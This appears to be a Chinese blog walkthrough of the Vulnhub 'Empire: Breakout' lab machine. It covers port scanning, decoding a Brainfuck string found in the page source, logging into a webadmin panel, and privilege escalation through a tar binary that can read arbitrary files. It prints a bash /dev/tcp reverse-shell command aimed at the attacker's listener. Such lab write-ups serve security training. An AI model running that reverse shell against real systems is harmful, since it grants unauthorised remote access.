【Vulnhub靶场】帝国冲突

环境准备

下载靶机,开机可以看到,他已经给出了靶机的IP地址。

攻击机IP地址为:192.168.2.15
靶机IP地址为:192.168.2.18

信息收集

使用nmap扫描靶机开放的端口信息

发现靶机开放了三个网页端口和SMB服务
我们去网站访问一下
80端口是正常的网页

但当我去查看源码的时候,发现了ook加密的过后的字符串

解密网站:brainfuck interpreter

输入cyber,和解密的密码,进入20000端口的网站,而且下方还有一个终端可以打开


看一下目录,得到第一个flag

提权

发现目录下还有另外一个文件tar,查看他的权限发现,是可以运行的
在这里插入图片描述
突然给这么一个可运行文件肯定是有深意的,我们看一下这个文件拥有的权限是什么
在这里插入图片描述
发现它是可以读取任意文件的

我们用tar把它打包之后再解压出来,就没有权限问题了

所以我们反弹一个shell到kali上,kali开始监听9999端口

bash -i >& /dev/tcp/192.168.197.131/9999 0>&1

总结

本靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权

使用 enum4linux 枚举信息
Brainfuck解密
webadmin 后台反弹 shell 提权
提权

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值